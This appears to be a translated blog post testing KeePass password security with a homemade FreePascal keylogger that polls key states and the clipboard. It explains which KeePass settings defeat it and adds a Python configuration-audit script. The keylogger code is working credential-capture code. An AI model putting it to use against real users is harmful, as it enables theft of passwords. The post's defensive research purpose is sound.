
The simplest keylogger and security in KeePass


To check how secure passwords entered via KeePass are, I decided to write a simple keylogger that also captures data from the clipboard. The whole code took a few lines of FreePascal.

As it turned out, without additional protection measures and proper KeePass configuration, passwords are quite vulnerable.

The keylogger code runs in a Timer handler that fires every 10 ms. Units used: Windows and ClipBrd.

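    // Keyboard: compare the state of every key code with the state saved on the previous tick
    for f := 0 to 255 do
      if a[f] <> GetAsyncKeyState(f) then
      begin
        // "KeePass Auto-Type" setting is on: record the key when it is released
        if KeePass.Checked and (GetAsyncKeyState(f) = 0) then Memo1.Caption := Memo1.Caption + chr(f);
        // Setting is off: record the key when it is pressed
        if not KeePass.Checked and (GetAsyncKeyState(f) <> 0) then Memo1.Caption := Memo1.Caption + chr(f);
      end;
    // Save the current key states for the next tick
    for f := 0 to 255 do a[f] := GetAsyncKeyState(f);
    // Clipboard: record the contents whenever they change
    if s <> Clipboard.AsText then
    begin
      s := Clipboard.AsText;
      Memo2.Caption := Memo2.Caption + s + ' ';
    end;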

The Simple Logger program looks like this:


The -Keyboard- window shows keys without regard to case or input language. What is displayed is the character whose code equals the key code: chr(f). The program could be modified to display all characters correctly, but that is not needed for this study.

The -Clipboard- window receives a copy of the clipboard contents whenever they change.

KeePass weak points and how to fix them


1. Entering the master password


By default, the KeePass master password is entered without protected mode, so Simple Logger captures it easily. This is the most critical weak point, because it gives access to the entire password database at once.

To fix the problem, you must enable the Security setting “Enter the master password in protected mode (like UAC in Windows Vista and higher)”. This mode does not allow the logger to access the keyboard. In addition, no screenshot can be taken in this mode to determine the location of the key file.

This mode applies only when the master password is entered. Protecting other passwords is discussed below.
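One way an administrator could check that this setting is really in force on a workstation, as an added example that is not part of the original article or of KeePass itself. It assumes the KeePass 2.x XML configuration layout, where the option (named "Enter master key on secure desktop" in the English interface) is stored as Security/MasterKeyOnSecureDesktop and where an enforced configuration file overrides the user and global ones; the function names and sample documents are constructed for illustration, so verify the element path against your installed version.

```python
import xml.etree.ElementTree as ET

# Assumed element path in KeePass 2.x configuration files (verify for your version).
SETTING = "Security/MasterKeyOnSecureDesktop"

def read_setting(xml_text):
    """Return True/False if this config layer defines the setting, None if it does not."""
    if not xml_text:
        return None
    node = ET.fromstring(xml_text).find(SETTING)
    if node is None or node.text is None:
        return None
    return node.text.strip().lower() == "true"

def audit(enforced=None, user=None, global_=None):
    """Classify the effective setting. Assumed precedence: enforced > user > global."""
    for name, xml_text in (("enforced", enforced), ("user", user), ("global", global_)):
        value = read_setting(xml_text)
        if value is None:
            continue  # this layer says nothing, fall through to the next one
        if not value:
            return f"FAIL: protected mode disabled by {name} config"
        if name == "enforced":
            return "OK: protected mode enabled and enforced"
        return f"WARN: enabled in {name} config only; users can switch it off"
    # The article notes that protected mode is off by default.
    return "FAIL: not set in any layer; default is off"

# Constructed sample configuration documents (not taken from a real installation).
ON = ("<Configuration><Security><MasterKeyOnSecureDesktop>true"
      "</MasterKeyOnSecureDesktop></Security></Configuration>")
OFF = ON.replace("true", "false")
EMPTY = "<Configuration><Security /></Configuration>"

if __name__ == "__main__":
    print(audit(user=ON))                 # enabled, but only by user choice
    print(audit(enforced=ON, user=OFF))   # enforced layer wins over the user layer
    print(audit(global_=EMPTY))           # nothing set anywhere
```
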

2. Clipboard


Simple Logger checks the clipboard for changes 100 times per second. Placing the password on the clipboard and clearing it a few seconds later therefore provides no protection in this case.

To fix this problem, you can use Auto-Type.

3. Auto-Type


KeePass auto-type is registered on key release, not on key press. This protects against some keyloggers. To get around this, Simple Logger has an additional setting: “KeePass Auto-Type”. When it is on, the logger triggers on key release.

When auto-typing via KeePass: MyLoginName LongPassword123

A record will appear in Simple Logger:



Simple Logger does not interpret key combinations. As you can see, the Shift key is displayed as a special character (similar to “+”) and “?”. Shift is released both before and after the capital letter. Still, this is enough to work out the password.

To solve this problem, you can use the “Two-channel auto-type obfuscation” setting in KeePass. In this case, KeePass enters part of the password through the keyboard and part through the clipboard, mixing the values. This gets around some keyloggers.

With two-channel auto-type obfuscation, Simple Logger records the following:




A small algorithm could recover the correct password from the data in both windows. This setting makes the keylogger's job harder but does not guarantee protection: if desired, the password is easily recovered.

Against a keylogger tailored to KeePass, additional means of protection can help.

4. Additional security features


In some software packages there are such features as:


When protection of data entry from the hardware keyboard is enabled, Simple Logger can no longer receive data from KeePass auto-type when it is entered into a password form in the browser. In this case, the weak point is the clipboard.

With a secure browser, Simple Logger could not access the clipboard or the keyboard. In addition, it was not possible to take screenshots.

Instead of a conclusion


After seeing how our employees use KeePass, I found some:


I am a manager in a small company, a little fond of programming. I am not a technical specialist or an expert in the field of security, so I would be happy if more experienced specialists pointed out the shortcomings of my small research.

I tested the latest version of KeePass 2.36 on Windows 8.1. To be fair, it should be noted that this problem is not just a KeePass problem. There are many other password keepers with a greater or lesser degree of security, but this is a topic for another study.

Links


  1. Simple Logger on GitHub
    For those who are not afraid, the archive "SimpleLogger_for_Win64.7z" contains the executable. The program does not allow full-fledged keylogging; it is intended for security research and informational purposes.
  2. Key Codes

UPD (07/27/2017)

Browser Plugin


As the user dartraiden noted, you can use the KeePassHttp module in conjunction with the browser add-on PassIFox or ChromeIPass. This plugin (according to the developer) provides a secure exposure of KeePass entries over HTTP.

This combination lets the browser fill in the login and password automatically while KeePass is unlocked. Simple Logger does not react in this case either.

The weak point of ChromeIPass is the generation of a new password, because it is copied through the clipboard and is visible on the screen. In this case, it is better to generate a new password in KeePass itself.

Creating a new master password


As arthur_veber noted:
When replacing the master password, as well as creating a new one, safe mode is not applied.

In this case, Simple Logger intercepts the master password entered in KeePass.

A virtual on-screen keyboard from a well-known manufacturer does not help either; like KeePass auto-type, it works on the key-release event.



It’s hard to give advice here. Perhaps the developers' attention should be drawn to this problem.

Other means of attack


As the user qw1 was the first to notice, if the system on which KeePass is installed is compromised, then other means of attack can be used besides the keylogger. In this case, the list of actions to counter the attack will depend on the specific situation.

Unfortunately, it is impossible to cover in one article all the protection measures necessary for storing passwords.

Source: https://habr.com/ru/post/334060/

